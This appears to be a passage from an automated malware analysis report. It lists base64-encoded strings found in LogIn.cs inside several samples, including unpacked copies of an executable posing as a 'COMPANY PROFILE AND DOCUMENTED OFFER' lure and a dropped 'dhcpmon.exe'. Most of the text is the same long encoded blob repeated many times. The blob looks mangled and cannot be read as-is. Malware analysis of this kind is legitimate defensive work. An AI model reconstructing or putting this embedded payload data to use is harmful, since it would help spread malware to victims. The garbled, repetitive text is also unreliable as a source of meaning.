OjtNxNNNElBjNNpVNXNNNRXxbNNvtzNNNXNNZROFtENNNTNPbNNOZjONO0NNNNPNNNRDOmWjNNPtbTVYvPNDNtXWbONT8bNNNXXPxNNNbNNvtINNNTOPtHNNNTPjpbRjNNOtZbSDNNOvtFNNNTQNtbXtNNPt0WolfNNNbqzuZRRDEiYNNNPuhnRjHEOKV9NNOjTOvAStNNNFtgNNNXWuLbYtNNPtNdRmNSNWpNNNNWNNNENPtiNNNXN28jNNNXPjVPwzxK2cRspTRZNb5cS9LK2usJwF8NNNRANb5cS9bGOORRRjHJRjLeBtxEOtVEOcRVLDpEO5SugWjEOjAiZDNNPusn/tRGPORVRjxEPFjTSuZUNPfVNORUS9LGOjNEOusJRjLEOuRSZpNWNb5cTAbK1usnS9nAYjNNNFtlNNNXqNHNNOfXXjNTXtNGZNHNctNNNNbNNORNStfPomZNNNbGOkVUXQDNNNbZPNwLTgtAPEsnS9nAYjNNNEZRPOsnRjtJRjxeDjtK2uZXSuZYXl0PRDxEP281NNNXRjjFQPt2NNNXXQpNNNbJRDDUTvt4NNNXNNpn1tfEPksJRjfEPkRXZp0EPEsJRjxEPERVZopEOOLbBDNNPuZSRDHK2usJwF8NNNRGOuRRTuRTSuRTwzxbBNNNPtNEOtbeNNLdNNNGZNVNXNNNNNfNNORNN3WYNNOjXQbNNNbbBjNNPaZwNNNXPjpPomjNNNc0VtNNNDbeNNLdRmNRNRbNNNNZNNNENNWiZDNNPuuopm0NNNbYNz8kNNNXTAbZSt0eUjpPPEuiCtNNPu8DXQ8NNNbbDNNNPz9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+PDNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
Source: sjZXfoyePbSa.exe.0.dr, LogIn.cs	Base64 encoded string: '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
Source: 0.0.COMPANY PROFILE AND DOCUMENTED OFFER.exe.a70000.0.unpack, LogIn.cs	Base64 encoded string: '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
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.a70000.0.unpack, LogIn.cs	Base64 encoded string: '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
Source: dhcpmon.exe.7.dr, LogIn.cs	Base64 encoded string: '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
Source: 7.0.COMPANY PROFILE AND DOCUMENTED OFFER.exe.9a0000.0.unpack, LogIn.cs	Base64 encoded string: 'GIdDNNZNNNNRNNNN//8NNYtNNNNNNNNNDNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtNNNNN4sht4NgNaAVotOGZ0uITucplOjpz9apzSgVTAuoz5iqPOvMFOlqJ4tnJ4tER9GVT1iMTHhQD0XWNNNNNNNNNODEDNNGNRQNViu868NNNNNNNNNNBNNNvRYNINNNPNNNNNTNNNNNNNNlw8NNNNtNNNNDNNNNNNNRDNtNNNNNtNNONNNNNNNNNNRNNNNNNNNNNPNNNNNNtNNNNNNNNZNDVHNNONNNONNNNNNRNNNRNNNNNNNNONNNNNNNNNNNNNNNUt/NNOCNNNNNRNNNBDQNNNNNNNNNNNNNNNNNNNNNNNNNTNNNNjNNNOpCjNNUNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNVNNNPNNNNNNNNNNNNNNNPPNNNRtNNNNNNNNNNNNNNP50MKu0NNNN0O8NNNNtNNNNVNNNNNVNNNNNNNNNNNNNNNNNNPNNNTNhpaAlLjNNNBDQNNNNDNNNNNDNNNNvNNNNNNNNNNNNNNNNNNONNNONYaWyoT9wNNNZNNNNNTNNNNNPNNNNWtNNNNNNNNNNNNNNNNNNDNNNDtNNNNNNNNNNNNNNNNNNNNPfCjNNNNNNNRtNNNNPNNHNhPHNNBjLNNNQNNNNNNNNNXD+NNP4NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNO4PXOLNNNbdWtNPXOpNNNbNXdMmTNNNPbNONNNRpkxNNNdNNtNNOUZnNNNXtNZNNNEmTjNNPbNRNNNRXuZjNDNDNNNNNDNNRDO+NDNNOT8pNNNXPvfNOvbGZNRNRNNNNNVNNORNstVNNNEiUDNNPtbeNNLdRmNONONNNNNQNNNENU4QNNNRok4NNNbXXjNTXuZjNDNDNNNNONNNRDO+ONNNOT8sNNNXPvfNOvbGZNVNCNNNNNHNNORNstHNNNDHXPNNNNbYOljuptRNNUQDODNNNvtuNNNXolVNNNcmVjNNPtjVtNHNNNDNNU4SNNNRPvfNOvbGZNRNPjNNNNLNNORNstLNNNDXXjNTXvVNNbNTNNNRXyMmQNNNOvtxNNNXqNLNNNXNOjNNOPbrNvtyNNNXXtNNRmNONNfNNNNUNNNENU4UNNNRPvfNOvbNRmNONNfNNNNUNNNENPtANNNTPvfNOvc+pwfNNUPNPNNNOUV7NNOjtNxNNNElBjNNpVNXNNNRXxbNNvtzNNNXNNZROFtENNNTNPbNNOZjONO0NNNNPNNNRDOmWjNNPtbTVYvPNDNtXWbONT8bNNNXXPxNNNbNNvtINNNTOPtHNNNTPjpbRjNNOtZbSDNNOvtFNNNTQNtbXtNNPt0WolfNNNbqzuZRRDEiYNNNPuhnRjHEOKV9NNOjTOvAStNNNFtgNNNXWuLbYtNNPtNdRmNSNWpNNNNWNNNENPtiNNNXN28jNNNXPjVPwzxK2cR